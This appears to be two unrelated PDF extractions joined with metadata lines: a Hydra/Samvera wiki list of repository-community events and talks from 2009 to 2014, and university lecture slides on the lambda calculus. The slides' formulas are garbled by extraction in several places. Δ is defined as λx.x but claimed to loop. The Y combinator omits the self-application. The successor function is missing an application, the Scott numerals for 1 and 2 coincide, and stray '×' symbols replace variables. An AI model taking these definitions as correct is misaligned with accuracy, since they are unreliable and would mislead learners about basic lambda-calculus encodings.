Hydra UK Regional meeting 22 October 2014 | London School of Economics and Political Science AMIA 2014 8-11 October 2014 | Savannah, Georgia Association of Moving Image Archivists (AMIA) annual conference Hydra Connect #2 - 30 September - 3 October 2014 | Case Western University, Cleveland, Ohio Annual gathering of the Hydra Community - 4 days including workshops, plenary and breakout sessions Innovatics conference 27-29 August 2014 | Santiago and Valparaiso, Chile Dive into Hydra workshop (in Spanish) as part of Innovatics conference Keynote speaker (Bess Sadler) Hydra Camp - 26-29 August 2014 | Princeton, New Jersey Four day Hydra Developer training class - syllabus Open Repositories 2014 9-13 June, 2014 | Helsinki, Finland Annual open source conference for the repository community. See below the list of Hydra-related talks accepted, with timings and links to abstracts on the OR2014 conference website. Workshops • WK1A and WK2A: GIS in Digital Repositories, 9th June, 9:00am-5:00pm - Abstract • WK1G: Introduction to Hydra for Developers, 9th June, 9:00-12:30 - Abstract • WK2E: DevOps for Digital Libraries, 9th June, 1:30-5:00 - Abstract • WK2F: Implementing RDF metadata in Hydra, 9th June, 1:30-5:00 - Abstract • WK3B: Hydra for Managers, 9th June, 5:30-7:00 - Abstract OR2014 Plenary • P3C: Self-deposit, discovery, and delivery of scientific datasets using GeoHydra, 10th June, 3:00-4:15 - Abstract • P4A: Spotlight: A Blacklight Plugin for Showcasing Digital Collections, 11th June, 11:15-12:30 - Abstract • P4E: Hacking User Experience in a Repository Service: ScholarSphere as a Case Study, 11 June, 11:15-12:30 - Abstract • P4B: Distributed Repositories of Medieval Calendars and Crowd-Sourcing of Transcription, 11 June 11:15-12:30 - Abstract • P4B: From Local Practice to Linked Open Data: Rethinking Metadata in Hydra, 11 June, 11:15-12:30 - Abstract • P4C: Building Successful, Open Repository Software Ecosystems: Technology and Community, 11th June, 11:15-12:30 - Abstract • P7A: From library repository to university-wide service: Stanford Digital Repository as a case study, 12th June, 11:15-12:30 - Abstract • P7C: Leveraging Agile & Resourcing for Success - Hydramata, Avalon, Fedora 4 and Islandora (panel), 12th June, 11:15-12:30 - Abstract • P7A: Audio and Video Repositories at Scale: Indiana University’s Media Digitization and Preservation Initiative, 12th June, 1:30-2:20 - Abstract • P8B: Sustaining your open source project through training: a Hydra case study, 12th June, 1:30-2:20 - Abstract • P8B: Hydramata: Building a Nimble Solution with Hydra to Transcend the Institutional Repository, 12th June, 1:30-2:20 - Abstract Fedora Interest Group • IG3A (Fedora/Hydra): Facing the Hydra alone: three case studies, 13th June, 11:15-12:30 - Abstract • IG3A (Fedora/Hydra): Extending the Hydra Head to Create a Pluggable, Extensible Architecture: Diving into the Technology of Hydramata, 13th June, 11:15-12:30 - Abstract • IG3A (Fedora/Hydra): Issues with Fedora & Hydra, experiences from a research-data-driven implementation, 13th June, 11:15-12:30 - Abstract • IG4A (Fedora): Avalon Media System project update: a Hydra solution for digital audio and video access, 13th June, 1:30-2:45 - Abstract Posters and Demonstrations - 10th June, 6:30-9:00 - Abstracts • Hydra Europe • Avalon Media System demonstration ORCID Outreach and CodeFest Meeting 21-22 May 2014 | Chicago Outreach meeting for customers, ORCID members, and researchers highlighting solutions and adoption strategies. • ORCID Identifiers in Repositories Panel: ORCID Hydra Plug-in Hydra Camp - 6-9 May | Minneapolis Four day Hydra developer training Hydra Developers Congress - 24-25 April 2014 | Stanford University Two day in-person Hydra Developer coding fest Hydra "Power" Steering meeting - invitation only - 24-25 April 2014 | Stanford University Two day strategic planning event - Hydra Steering Group and Invited advisers only LAMDevConX - invitation only 21-23 April 2014 | Stanford University Library, Archive, and Museum technical summit - invitation only event European Hydra Camp - 8-11 April 2014 | Trinity College Dublin Four day Hydra developer training course European Hydra Symposium Code4Lib 2014 24 - 27 March | Raleigh, NC Annual grassroots library technologist conference in the US - Intro to Blacklight - Blacklight hackfest - Rails Bridge intro to programming - GeoHydra: Managing Geospatial Content Scheduled talks: - Building for others (and ourselves): the Avalon Media System - Sustaining your Open Source project through training - Behold Fedora 4: The Incredible Shrinking Repository! ORCID Dev Congress 4-7 March 2014 | Chicago Dev House ORCID and Hydra Plug-in integration Adopter and Contributor Dev Meeting to jump start adoption Hydra Connect January 2014 21-24 January 2014 | UCSD, San Diego Hydra Activities at DLF2013 CNI Fall 2013 9-10 Dec 2013 | Washington, DC - Collaborating to Manage Research Data (Notre Dame and Hydra Partners) (pptx) DLF 2013 4-6 Nov 2013 | Austin, TX Hydra Activities at DLF2013 EOD Conference 17-18 October 2013 | National Library of Technology, Prague, Czech Republic From content silos to an integrated digital library (Royal Library project presentation, including slides about Hydra) HydraCamp 1-4 October 2013 | Case Western Reserve University, Cleveland, OH HydraCamp Syllabus - Fall 2013 DARIAH General VCC Meeting 5-6 September 2013 | Copenhagen, Denmark Using Hydra/Fedora for digital library infrastructure (5 minutes presentation) OR13 Conference 7-13 July 2013 | Prince Edward Island, Canada Hydra Activities at OR13 - State of the HydraSphere for OR13 (pptx) 24x7 Presentation: "Testing Your Archive: Delivering on the Promise of Persistence" Duke University Libraries Preservation Repository Hydra poster Hydra Camp 8-12 April 2013 | Dublin LibDevConX^4 25-27 March 2013 | Stanford Code4Lib 2013 February 11-14 | Chicago, IL Hydra UK 22 November 2012, LSE, London - Introduction to Hydra by Chris Awre - Hydra in Hull by Richard Green - Hydra@GCU: a repository for audio and video by Caroline Webb - Hydra at LSE by Ed Fay - Hydra at Oxford by Neil Jefferies - Hydra UK discussion notes - Twitter hashtag for ongoing comment and discussion - #hydrauk - Ariadne event report Hydra Webinar Series - Fall, 2012 - DuraSpace Webinar Hub - Series Announcement - Hydra Webinar Series - 2012 - Webinar 1 – Introduction to Hydra, presented by Tom Cramer (Sept 25, 2012) - Watch the Webinar Recording - View the slides (slideshare) - Webinar 2 - A Case Study on General Repository Applications, presented by Rick Johnson and Richard Green (Oct 16, 2012) - Watch the Webinar Recording - View the slides (slideshare) - Webinar 3 - Hydra Technical Deep Dive, presented by Matt Zumwalt (scheduled for Oct 30, 2012, but recorded separately due to Superstorm Sandy) - Watch the Webinar Recording - Watch the Q&A follow-up session - View the slides (slideshare) OR12 Conference 9-13 July 2012, Edinburgh – Schedule of Hydra Events at OR12 in Edinburgh - Intro to Hydra for OR12 PreConWorkshop by Chris Awre - HydraSphere: One Body, Many More Heads, One Year Later Fedora User Group panel on Hydra, by Tom Cramer - Hylandora by Tom Cramer and Jonathan Green - Hydra Framework Technical Update for OR12 by Matt Zumwalt - Seaside Research Portal: A Best of Breed Approach to Digital Exhibits and Collection Management by Rick Johnson - Towards a mature, multi-purpose repository for the institution by Chris Awre LibDevConX^3 26-28 March 2012, Stanford CNI 2011 December 12 - 13, 2011 | Arlington, VA *Hydra: One Body, Many Heads for Repository-Powered Library Applications* DLF 2011 Forum 31 Oct - 1 November, 2011 | Baltimore Hypatia *Proposal, Powerpoint* OR11 Conference 7-11 June 2011 | Austin Main conference presentation *Building the Hydra - Enhancing Repository Provision through Multi-Institution Collaboration*: Chris Awre Fedora track 24/7 block: * SALT, ETDs and EEMs - Stanford's suite of Hydra services: Tom Cramer * Libra - an unmediated, self-deposit, institutional repository at the University of Virginia : Julie Meloni * Hydra in Hull: Richard Green * A Hydra head for Northwestern University Digital Image Library: Bill Parod * Hydra-based digital exhibits gallery at Notre Dame: Dan Brubaker Horst Fedora track: Tools and integration * Hydra technical deep-dive: Matt Zumwalt Hydra-related presentations * CLIF: Moving repositories upstream in the content lifecycle: Richard Green and Simon Waddington LibDevConX^2 21 - 23 March 2011 | Stanford University Code4Lib 2011 7-10 February, 2011 | Bloomington, Indiana Related Presentations: * Digital Exhibits at Notre Dame Using Hydra by Rick Johnson & Dan Brubaker Horst * Opinionated Metadata by Matt Zumwalt Fedora UK & Ireland group meeting 13 December 2010 | London School of Economics and Political Science DLF Fall Forum 1-3 November 2010 | Palo Alto, CA *Tom Cramer & Matt Zumwalt's presentation* Hydra Camp 4-8 October 2010 | Minneapolis Repository Fringe September 2010 | Edinburgh Presentation: Hydra - Chris Awre (Video) OR10 Conference 6-9 July 2010 | Madrid Related Presentations: Hydra: a technical and community framework for customised, shared repository applications Blacklight: Leveraging a Rich Discovery Interface in Open Repository Architectures LibDevConX 23 - 25 March 2010 | Stanford University Fedora UK & Ireland User Group, Fedora EU User Group 8 December 2009 | Oxford Presentations: - The Hydra initiative: Underpinning repository interaction for research support - Chris Awre - Content models in the Hydra Project - Richard Green Fedora UK & Ireland User Group 9 June 2009 | Dublin, Republic of Ireland OR09 Conference 18-21 May 2009 | Atlanta, GA Presentations: - Designing and building a reusable framework for multipurpose, multifunction, multi-institutional repository-powered solutions - available here - Case studies in workflow: Three approaches - available here Related Conferences - Annual schedule of Samvera-related conferences which Samverans may be interested in attending
{"Source-Url": "https://wiki.lyrasis.org/download/temp/pdfexport-20200912-120920-2127-5163/samvera-Events%2Cpresentationsandarticles-120920-2127-5164.pdf?contentType=application/pdf", "len_cl100k_base": 5137, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 27623, "total-output-tokens": 6452, "length": "2e12", "weborganizer": {"__label__adult": 0.000530242919921875, "__label__art_design": 0.00220489501953125, "__label__crime_law": 0.0007276535034179688, "__label__education_jobs": 0.0958251953125, "__label__entertainment": 0.00043702125549316406, "__label__fashion_beauty": 0.000331878662109375, "__label__finance_business": 0.002353668212890625, "__label__food_dining": 0.0005044937133789062, "__label__games": 0.0011587142944335938, "__label__hardware": 0.0010957717895507812, "__label__health": 0.0007348060607910156, "__label__history": 0.0016870498657226562, "__label__home_hobbies": 0.0004651546478271485, "__label__industrial": 0.0005664825439453125, "__label__literature": 0.0010347366333007812, "__label__politics": 0.0011243820190429688, "__label__religion": 0.0006422996520996094, "__label__science_tech": 0.05950927734375, "__label__social_life": 0.002239227294921875, "__label__software": 0.308837890625, "__label__software_dev": 0.51513671875, "__label__sports_fitness": 0.0004398822784423828, "__label__transportation": 0.0006890296936035156, "__label__travel": 0.001720428466796875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 19216, 0.08668]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 19216, 0.00315]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 19216, 0.79345]], "google_gemma-3-12b-it_contains_pii": [[0, 1387, false], [1387, 2480, null], [2480, 3287, null], [3287, 3962, null], [3962, 4802, null], [4802, 5766, null], [5766, 6785, null], [6785, 9072, null], [9072, 11757, null], [11757, 13316, null], [13316, 14767, null], [14767, 16627, null], [16627, 18141, null], [18141, 19216, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1387, true], [1387, 2480, null], [2480, 3287, null], [3287, 3962, null], [3962, 4802, null], [4802, 5766, null], [5766, 6785, null], [6785, 9072, null], [9072, 11757, null], [11757, 13316, null], [13316, 14767, null], [14767, 16627, null], [16627, 18141, null], [18141, 19216, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 19216, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 19216, null]], "pdf_page_numbers": [[0, 1387, 1], [1387, 2480, 2], [2480, 3287, 3], [3287, 3962, 4], [3962, 4802, 5], [4802, 5766, 6], [5766, 6785, 7], [6785, 9072, 8], [9072, 11757, 9], [11757, 13316, 10], [13316, 14767, 11], [14767, 16627, 12], [16627, 18141, 13], [18141, 19216, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 19216, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
0d8891f03c7973476e4886cedaba238616d7448b
CMSC 631 – Program Analysis and Understanding Fall 2007 Lambda Calculus Motivation • Commonly-used programming languages are large and complex ■ ANSI C99 standard: 538 pages ■ ANSI C++ standard: 714 pages ■ Java language specification 2.0: 505 pages • Not good vehicles for understanding language features or explaining program analysis Goal • Develop a “core language” that has ■ The essential features ■ No overlapping constructs ■ And none of the cruft – Extra features of full language can be defined in terms of the core language (“syntactic sugar”) • Lambda calculus ■ Standard core language for single-threaded procedural programming ■ Often with added features (e.g., state); we’ll see that later Lambda Calculus is Practical! • An 8-bit microcontroller (Zilog Z8 encore board w/4KB SRAM) computing 1 + 1 using Church numerals in the Lambda calculus Origins of Lambda Calculus - Invented in 1936 by Alonzo Church (1903-1995) - Princeton Mathematician - Lectures of lambda calculus published in 1941 - Also known for - Church’s Thesis - All effective computation is expressed by recursive (decidable) functions, i.e., in the lambda calculus - Church’s Theorem - First order logic is undecidable Lambda Calculus - Syntax: - \( e ::= x \) variable - \( \lambda x \cdot e \) function abstraction - \( e \cdot e \) function application - Only constructs in pure lambda calculus - Functions take functions as arguments and return functions as results - I.e., the lambda calculus supports higher-order functions Semantics - To evaluate \((\lambda x. e_1) \ e_2\) - Bind \(x\) to \(e_2\) - Evaluate \(e_1\) - Return the result of the evaluation - This is called “beta reduction” - \((\lambda x. e_1) \ e_2 \rightarrow_\beta e_1[e_2/x]\) - \((\lambda x. e_1) \ e_2\) is called a redex - We’ll usually omit the beta Three Conveniences - Syntactic sugar for local declarations - \(let \ x = e_1 \ in \ e_2\) is short for \((\lambda x. e_2) \ e_1\) - Scope of \(\lambda\) extends as far to the right as possible - \(\lambda x. \lambda y. x \ y\) is \(\lambda x. (\lambda y. (x \ y))\) - Function application is left associative - \(x \ y \ z\) is \((x \ y) \ z\) Scoping and Parameter Passing • Beta reduction is not yet precise ■ \((\lambda x.e1) e2 \rightarrow e1[e2/x]\) ■ what if there are multiple \(x\)’s? • Example: ■ let \(x = a\) in ■ let \(y = \lambda z.x\) in ■ let \(x = b\) in \(y x\) ■ which \(x\)’s are bound to \(a\), and which to \(b\)? Static (Lexical) Scope • Just like most languages, a variable refers to the closest definition • Make this precise using variable renaming ■ The term – let \(x = a\) in let \(y = \lambda z.x\) in let \(x = b\) in \(y x\) ■ is “the same” as – let \(x = a\) in let \(y = \lambda z.x\) in let \(w = b\) in \(y w\) ■ Variable names don’t matter Free and Bound Variables • The set of free variables of a term is - \( \text{FV}(x) = \{x\} \) - \( \text{FV}(\lambda x.e) = \text{FV}(e) - \{x\} \) - \( \text{FV}(e_1 e_2) = \text{FV}(e_1) \cup \text{FV}(e_2) \) • A term \( e \) is closed if \( \text{FV}(e) = \emptyset \) • A variable that is not free is bound Alpha Conversion • Terms are equivalent up to renaming of bound variables - \( \lambda x.e = \lambda y.(e[y/x]) \) if \( y \notin \text{FV}(e) \) • This is often called alpha conversion, and we will use it implicitly whenever we need to avoid capturing variables when we perform substitution Substitution • Formal definition: - \( x[e/x] = e \) - \( z[e/x] = z \) if \( z \neq x \) - \( (e_1 e_2)[e/x] = (e_1[e/x] e_2[e/x]) \) - \( (\lambda z. e_1)[e/x] = \lambda z. (e_1[e/x]) \) if \( z \neq x \) and \( z \notin \text{FV}(e) \) • Example: - \( (\lambda x. y \ x) \ x =_\alpha (\lambda w. y \ w) \ x \rightarrow_\beta y \ x \) - (We won’t write alpha conversion explicitly in general) A Note on Substitutions • People write substitution many different ways - \( e_1[e_2/x] \) - \( e_1[x+e_2] \) - \([x/e_2]e_1 \) - and more... • But they all mean the same thing - The variable is being substituted with the term Multi-Argument Functions - We can’t (yet) write multi argument functions - E.g., a function of two arguments \( \lambda(x, y).e \) - Trick: Take arguments one at a time - \( \lambda x. \lambda y. e \) - This is a function that, given argument \( x \), returns a function that, given argument \( y \), returns \( e \) - \( (\lambda x. \lambda y. e) \ a \ b \rightarrow (\lambda y. e[a\ x]) \ b \rightarrow e[a\ x][b\ y] \) - This is often called Currying and can be used to represent functions with any # of arguments Booleans - \( \text{true} = \lambda x. \lambda y. x \) - \( \text{false} = \lambda x. \lambda y. y \) - if \( a \) then \( b \) else \( c \) = \( a \ b \ c \) - Example: - if \( \text{true} \) then \( b \) else \( c \) \( \rightarrow (\lambda x. \lambda y. x) \ b \ c \rightarrow (\lambda y. b) \ c \rightarrow b \) - if \( \text{false} \) then \( b \) else \( c \) \( \rightarrow (\lambda x. \lambda y. y) \ b \ c \rightarrow (\lambda y. y) \ c \rightarrow c \) Combinators • Any closed term is also called a combinator ■ So true and false are both combinators • Other popular combinators ■ I = \( \lambda x.x \) ■ K = \( \lambda x.\lambda y.x \) ■ S = \( \lambda x.\lambda y.\lambda z.x \; z \; (y \; z) \) ■ Can also define calculi in terms of combinators – E.g., the SKI calculus – Turns out the SKI calculus is also Turing complete Pairs • \((a, b) = \lambda x.\text{if } x \text{ then } a \text{ else } b\) • \(\text{fst} = \lambda p.p \; \text{true}\) • \(\text{snd} = \lambda p.p \; \text{false}\) • Then ■ \(\text{fst} \; (a, \; b) \rightarrow^* a\) ■ \(\text{snd} \; (a, \; b) \rightarrow^* b\) Natural Numbers (Church) - $0 = \lambda f.\lambda x. x$ - $1 = \lambda f.\lambda x. f \times$ - $2 = \lambda f.\lambda x. f(f \times)$ - i.e., $n = \lambda f.\lambda x. \text{<apply f n times to x>}$ - $\text{succ} = \lambda n.\lambda f.\lambda x. (n f \times)$ - $\text{iszero} = \lambda n. n (\lambda x. \text{false}) \text{ true}$ Natural Numbers (Scott) - $0 = \lambda x.\lambda y. x$ - $1 = \lambda x.\lambda y. y \times$ - $2 = \lambda x.\lambda y. y \times$ - I.e., $n = \lambda x.\lambda y. y (n-\times)$ - $\text{succ} = \lambda n.\lambda x.\lambda y. y \times n$ - $\text{pred} = \lambda n. n 0 (\lambda x. x)$ - $\text{iszero} = \lambda n. n \text{ true (} \lambda x. \text{false)}$ A Nondeterministic Small-Step Semantics \[(\lambda x. e_1) e_2 \rightarrow e_1[e_2\backslash x]\] \[e \rightarrow e'\] \[e_1 \rightarrow e_1'\] \[e_1 e_2 \rightarrow e_1'e_2\] \[e_2 \rightarrow e_2'\] \[e_1 e_2 \rightarrow e_1 e_2'\] Why are these semantics non-deterministic? Example - We can apply reduction anywhere in a term - \[(\lambda x. (\lambda y. y) x ((\lambda z. w) x)) \rightarrow \lambda x. ((\lambda z. w) x) \rightarrow \lambda x. w\] - \[(\lambda x. (\lambda y. y) x ((\lambda z. w) x)) \rightarrow \lambda x. ((\lambda z. w) x) \rightarrow (\lambda y. y x (w)) \rightarrow \lambda x. x w\] - Does the order of evaluation matter? The Church-Rosser Theorem - Lemma (The Diamond Property): - If \( a \rightarrow b \) and \( a \rightarrow c \), there exists \( d \) such that \( b \rightarrow^* d \) and \( c \rightarrow^* d \) - Church Rosser Theorem: - If \( a \rightarrow^* b \) and \( a \rightarrow^* c \), there exists \( d \) such that \( b \rightarrow^* d \) and \( c \rightarrow^* d \) - Proof: By diamond property - Church-Rosser is also called confluence Proof \[ \ldots \] Normal Form • A term is in normal form if it cannot be reduced • Examples: $\lambda x.x$, $\lambda x.\lambda y.z$ • Some normal forms referred to as values: the “legal” end results of programs • By Church Rosser Theorem, every term reduces to at most one normal form • Notice that for our application rule, the argument need not be a normal form Beta-Equivalence • Let $\equiv_{\beta}$ be the reflexive, symmetric, and transitive closure of $\rightarrow$ • Usually we think only of reduction; adding symmetry extends this to equivalence • E.g., $(\lambda x.x) y \rightarrow y \leftarrow (\lambda z.\lambda w.z) y y$, so all three are beta equivalent • If $a =_{\beta} b$, then $\exists c$ such that $a \rightarrow^* c$ and $b \rightarrow^* c$ • Proof: Consequence of Church-Rosser Theorem • In particular, if $a =_{\beta} b$ and both are normal forms, then they are equal Not Every Term Has a Normal Form - Consider - \( \Delta = \lambda x.x \) - Then \( \Delta \Delta \rightarrow \Delta \Delta \rightarrow \cdots \) - In general, self application leads to loops - ...which is good if we want recursion --- Type systems and normalization - It is possible to use types to distinguish “well-behaved” lambda calculus expressions from the others - Often, type systems can be used to establish that all well-typed expressions have a normal form - if \( e : t \) then \( e \rightarrow^* v \) - If an expression \( e \) has a type \( t \), then \( e \) reduces to a normal form \( v \) (\( v \) is a value; irreducible) - This kind of property of a type system is called “strong normalization.” More on type systems later. **A Fixpoint Combinator** - Also called a paradoxical combinator \[ Y = \lambda f. (\lambda x. f(x)) (\lambda x. f(x)) \] Note: There are many versions of this combinator - Then \( YF = \beta F (YF) \) for any \( F \) \[ YF = (\lambda f. (\lambda x. f(x)) (\lambda x. f(x))) F \] \[ \rightarrow (\lambda x. F(x)) (\lambda x. F(x)) \] \[ \rightarrow F((\lambda x. F(x)) (\lambda x. F(x))) \] \[ \leftarrow F(YF) \] --- **Example** - Fact \( n = \text{if } n = 0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1) \) - Let \( G = \lambda f. \text{<body of factorial>} \) I.e., \( G = \lambda f. \lambda n. \text{if } n = 0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1) \) - \( YG1 = \beta G(YG)1 \) \[ = _\beta (\lambda f. \lambda n. \text{if } n = 0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1)) (YG)1 \] \[ = _\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times ((YG)0) \] \[ = _\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times (G(YG)0) \] \[ = _\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times (\lambda f. \lambda n. \text{if } n = 0 \text{ then } 1 \text{ else } n \times \text{fact}(n-1)) (YG)0 \] \[ = _\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times (\text{if } 0 = 0 \text{ then } 1 \text{ else } 0 \times ((YG)0)) \] \[ = _\beta \text{if } 1 = 0 \text{ then } 1 \text{ else } 1 \times (YG)0 \] \[ = _\beta 1 \times 1 = 1 \] In Other Words - The Y combinator “unrolls” or “unfolds” its argument an infinite number of times - \( Y \ G = G \ (Y \ G) = G \ (G \ (Y \ G)) = G \ (G \ (G \ (Y \ G))) = \ldots \) - \( G \) needs to have a “base case” to ensure termination - Sufficient to encode arbitrary recursion - But, only works because we’re call-by-name - Different combinator(s) for call-by-value - \( Z = \lambda f. (\lambda x. f \ (\lambda y. x \ x \ y)) \ (\lambda x. f \ (\lambda y. x \ x \ y)) \) - Why is this a fixed-point combinator? How does its difference from \( Y \) make it work for call-by-value? Encodings - Encodings are fun; they show language expressiveness - In practice, we usually add constructs as primitives - Much more efficient - Much easier to perform program analysis on and avoid silly mistakes with - E.g., our encodings of true and 0 are exactly the same, but we may want to forbid mixing booleans and integers Lazy vs. Eager Evaluation • Our non-deterministic reduction rule is fine for theory, but awkward to implement • Two deterministic strategies: ▪ Lazy: Given \((\lambda x. e_1) \ e_2\), do not evaluate \(e_2\) if \(x\) does not “need” \(e_1\) - Also called left-most, call-by-name, call-by-need, applicative, normal-order (with slightly different meanings) ▪ Eager: Given \((\lambda x. e_1) \ e_2\), always evaluate \(e_2\) fully before applying the function - Also called call-by-value Lazy (Big-Step) Operational Semantics \[ \begin{align*} (\lambda x. e_1) & \rightarrow^l (\lambda x. e_1) \\ e_1 & \rightarrow^l \lambda x. e \ e[\ e_2\ x\ ] \rightarrow^l e' \ \\ e_1 \ e_2 & \rightarrow^l e' \end{align*} \] • The rules are deterministic • The rules do not reduce under \(\lambda\) • The rules are normalizing: ▪ If \(a\) is closed and there is a normal form \(b\) such that \(a \rightarrow^* b\), then \(a \rightarrow^l d\) for some \(d\) Eager (Big-Step) Operational Semantics \[(\lambda x. e_1) \rightarrow^e (\lambda x. e_1)\] \[e_1 \rightarrow^e \lambda x. e \quad e_2 \rightarrow^e e' \quad e[e'\Delta] \rightarrow^e e''\] - This semantics is also deterministic and does not reduce under \(\lambda\) - But it is not normalizing - Example: let \(x = \Delta \Delta\) in \((\lambda y. y)\) Lazy vs. Eager in Practice - Lazy evaluation (call by name, call by need) - Has some nice theoretical properties - Terminates more often - Lets you play some tricks with “infinite” objects - Main example: Haskell - Eager evaluation (call by value) - Is generally easier to implement efficiently - Blends more easily with side effects - Main examples: Most languages (C, Java, ML, etc.) Functional Programming - The \( \lambda \) calculus is a prototypical functional programming language: - Lots of higher-order functions - No side-effects - In practice, many functional programming languages are “impure” and permit side-effects - But you’re supposed to avoid using them Influence of Functional Programming - Functional ideas in many other languages - Garbage collection was first designed with Lisp; most languages often rely on a GC today - Generics in Java/C++ came from polymorphism in ML and from type classes in Haskell - Higher-order functions and closures (used widely in Ruby; proposed extension to Java) are pervasive in all functional languages - Many data abstraction principles of OO came from ML’s module system - … Call-by-Name Example **OCaml** ```ocaml let cond p x y = if p then x else y let rec loop () = loop () let z = cond true 42 (loop ()), ``` *infinite loop at call* **Haskell** ```haskell cond p x y = if p then x else y loop () = loop () z = cond True 42 (loop ()), ``` *3rd argument never used by cond, so never invoked* Two Cool Things to Do with CBN - Build control structures with functions ``` cond p x y = if p then x else y ``` - “Infinite” data structures ``` integers n = n:(integers (n+1)) take 10 (integers 0) (* infinite loop in cbv *) ```
{"Source-Url": "https://www.cs.umd.edu/class/fall2007/cmsc631/lectures/lambda.pdf", "len_cl100k_base": 4802, "olmocr-version": "0.1.49", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 39783, "total-output-tokens": 5959, "length": "2e12", "weborganizer": {"__label__adult": 0.00043892860412597656, "__label__art_design": 0.00039768218994140625, "__label__crime_law": 0.00037217140197753906, "__label__education_jobs": 0.0025806427001953125, "__label__entertainment": 9.453296661376952e-05, "__label__fashion_beauty": 0.000186920166015625, "__label__finance_business": 0.00023746490478515625, "__label__food_dining": 0.0005750656127929688, "__label__games": 0.000576019287109375, "__label__hardware": 0.0010280609130859375, "__label__health": 0.0008769035339355469, "__label__history": 0.000347137451171875, "__label__home_hobbies": 0.00017559528350830078, "__label__industrial": 0.0006809234619140625, "__label__literature": 0.0004420280456542969, "__label__politics": 0.00035381317138671875, "__label__religion": 0.0007581710815429688, "__label__science_tech": 0.043975830078125, "__label__social_life": 0.00018024444580078125, "__label__software": 0.0035610198974609375, "__label__software_dev": 0.9404296875, "__label__sports_fitness": 0.0005502700805664062, "__label__transportation": 0.0008025169372558594, "__label__travel": 0.00025200843811035156}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14800, 0.01284]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14800, 0.85873]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14800, 0.6956]], "google_gemma-3-12b-it_contains_pii": [[0, 347, false], [347, 886, null], [886, 1571, null], [1571, 2241, null], [2241, 2904, null], [2904, 3525, null], [3525, 4174, null], [4174, 5170, null], [5170, 5839, null], [5839, 6538, null], [6538, 7199, null], [7199, 7660, null], [7660, 8549, null], [8549, 9308, null], [9308, 10792, null], [10792, 11740, null], [11740, 12703, null], [12703, 13464, null], [13464, 14229, null], [14229, 14800, null]], "google_gemma-3-12b-it_is_public_document": [[0, 347, true], [347, 886, null], [886, 1571, null], [1571, 2241, null], [2241, 2904, null], [2904, 3525, null], [3525, 4174, null], [4174, 5170, null], [5170, 5839, null], [5839, 6538, null], [6538, 7199, null], [7199, 7660, null], [7660, 8549, null], [8549, 9308, null], [9308, 10792, null], [10792, 11740, null], [11740, 12703, null], [12703, 13464, null], [13464, 14229, null], [14229, 14800, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14800, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14800, null]], "pdf_page_numbers": [[0, 347, 1], [347, 886, 2], [886, 1571, 3], [1571, 2241, 4], [2241, 2904, 5], [2904, 3525, 6], [3525, 4174, 7], [4174, 5170, 8], [5170, 5839, 9], [5839, 6538, 10], [6538, 7199, 11], [7199, 7660, 12], [7660, 8549, 13], [8549, 9308, 14], [9308, 10792, 15], [10792, 11740, 16], [11740, 12703, 17], [12703, 13464, 18], [13464, 14229, 19], [14229, 14800, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14800, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
f5bbdb0d0d2053717c9f56b62b29e6d443e7db6c
